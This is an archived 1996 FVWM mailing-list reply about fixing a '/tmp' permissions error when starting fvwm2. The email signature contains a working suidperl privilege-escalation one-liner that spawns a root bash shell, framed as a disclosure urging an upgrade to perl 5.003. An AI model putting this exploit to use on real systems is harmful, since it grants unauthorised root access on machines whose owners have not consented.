Subject: Re: FVWM: "exclusive open failed.."

From: Joey Hess <[email-masked]>
Date: Tue, 23 Jul 1996 17:33:49 -0400 (EDT)

> > "exclusive open for tmp_name failed in m4_defs: Permission denied"
> > 
> > If I run startx as root, I don't get the error, and fvwm comes up fine.
> > 
> > Anyone know what could be causing this error? 
> 
> Check the permissions on your /tmp/ directory.  Do you have write
> permission?

Thanks, that was the problem. I had a /tmp with all the proper
permissions, but the client I was running fvwm2 on was using a different
directory as /tmp, and I had negelcted to fix the permissions there. 

-- 
#!/bin/sh # Root in 30 seconds or less. Fix this hole; upgrade to perl 5.003!
a=~/Im_root;echo -e '#!/usr/bin/suidperl -U\n#                Joey Hess
$>=$<=0;exec"/bin/bash"'>$a;chmod 2755 $a;$a #            [email-masked]
                      "He. He. He." - - Herman Toothrot

--
Visit the official FVWM web page at <URL:http://www.hpc.uh.edu/fvwm/>.
To unsubscribe from the list, send "unsubscribe fvwm" in the body of a
message to [email-masked].
To report problems, send mail to [email-masked].